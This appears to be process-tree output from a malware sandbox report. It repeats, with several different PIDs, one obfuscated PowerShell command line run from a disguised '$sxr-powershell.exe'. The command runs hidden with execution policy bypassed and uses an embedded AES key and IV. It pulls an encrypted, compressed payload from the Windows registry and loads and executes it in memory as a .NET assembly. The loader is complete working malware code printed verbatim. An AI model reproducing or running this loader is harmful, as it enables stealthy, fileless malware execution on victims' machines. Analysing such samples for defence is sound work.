[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:7296
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8096).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:2868
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8096).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:6768
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8096).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:2844
        
        C:\Windows\$sxr-powershell.exe
        
